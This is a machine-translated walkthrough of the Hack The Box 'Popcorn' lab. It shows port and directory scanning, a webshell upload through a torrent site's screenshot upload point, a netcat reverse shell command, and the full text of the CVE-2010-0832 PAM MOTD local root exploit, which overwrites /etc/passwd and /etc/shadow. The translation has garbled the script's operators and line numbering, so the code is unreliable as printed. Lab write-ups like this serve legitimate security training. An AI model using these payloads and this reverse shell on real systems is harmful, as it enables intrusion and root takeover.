Hack The Box —— Popcorn

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.6

I found that the server opened the 22-port and 80-port browser to access the http service, and found that there was only the default page of apache.

目录扫描

Use the dirsearch tool to scan a wave of directories:

1

python3 dirsearch -u http://10.10.10.6 -e html

Discover the test.php page and torrent directory, perform directory scanning for the torrent directory, and discover that the upload upload directory can be accessed, and the index.php page exists at the same time.

功能点搜索

This website is a bt seed forum site, registered users, and discovered upload page.

漏洞利用

At the upload point, I tried to upload a webshell and found that it failed. I guessed that the program detected whether the uploaded file was a standard bt seed file and did not bypass the filtering.

Continue to upload the normal bt seed file and conduct further testing :

I found that the uploaded seed page exists on the screenshots icon upload point.

Try uploading the webshell and found that it was successfully uploaded.

Visit the upload directory and get the address of the webshell:

Kitchen knife connection:

Successfully obtained the user's flag.

At the same time, you will find the .cache folder in the home directory. After entering, you will find the motd.legal-displayed file.

Use search engines to search for related documents and find:

https://www.exploit-db.com/exploits/14339

Use a virtual terminal to bounce a shell to the local area to facilitate the power increase operation.

Native: nc -l 4444

Victim machine: nc -e /bin/bash 10.10.14.10 4444

Upload exp scripts using kitchen knife :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

#!/bin/bash

#

# Exploit Title: Ubuntu PAM MOTD local root

# Date: July 9, 2010

# Author: Anonymous

# Software Link: http://packages.ubuntu.com/

# Version: pam-1.1.0

# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)

# CVE: CVE-2010-0832

# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i

# References: http://www.exploit-db.com/exploits/14273/by Kristian Erik Hermansen

P='toor:x:0:0:root:/root:/bin/bash'

S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:999999:7:'

echo '[*] Ubuntu PAM MOTD local root'

[ -z '$(which ssh)' ] echo '[-] ssh is a requirement' exit 1

[ -z '$(which ssh-keygen)' ] echo '[-] ssh-keygen is a requirement' exit 1

[ -z '$(ps -u root |grep sshd)' ] echo '[-] a running sshd is a requirement' exit 1

backup() {

[ -e '$1' ] [ -e '$1'.bak ] rm -rf '$1'.bak

[ -e '$1' ] || return 0

mv '$1'{,bak} || return 1

echo '[*] Backuped $1'

}

restore() {

[ -e '$1' ] rm -rf '$1'

[ -e '$1'.bak ] || return 0

mv '$1'{.bak,} || return 1

echo '[*] Restored $1'

}

key_create() {

backup ~/.ssh/authorized_keys

ssh-keygen -q -t rsa -N '' -C 'pam' -f '$KEY' || return 1

[ ! -d ~/.ssh ] { mkdir ~/.ssh || return 1; }

mv '$KEY.pub' ~/.ssh/authorized_keys || return 1

echo '[*] SSH key set up'

}

key_remove() {

rm -f '$KEY'

restore ~/.ssh/authorized_keys

echo '[*] SSH key removed'

}

own() {

[ -e ~/.cache ] rm -rf ~/.cache

ln -s '$1' ~/.cache || return 1

echo '[*] spawn ssh'

ssh -o 'NoHostAuthenticationForLocalhost yes' -i '$KEY' localhost true

[ -w '$1' ] || { echo '[-] Own $1 failed'; restore ~/.cache; bye; }

echo '[+] owned: $1'

}

bye() {

key_remove

exit 1

}

KEY='$(mktemp -u)'

key_create || { echo '[-] Failed to setup SSH key'; exit 1; }

backup ~/.cache || { echo '[-] Failed to backup ~/.cache'; bye; }

own /etc/passwd echo '$P' /etc/passwd

own /etc/shadow echo '$S' /etc/shadow

restore ~/.cache || { echo '[-] Failed to restore ~/.cache'; bye; }

key_remove

echo '[+] Success! Use password toor to get root'

su -c 'sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \

chgrp shadow /etc/shadow; nscd -i passwd /dev/null 21; bash' to or

And give the script execution permissions:

1

chmod + x 1.sh

Execute the script and obtain root permissions: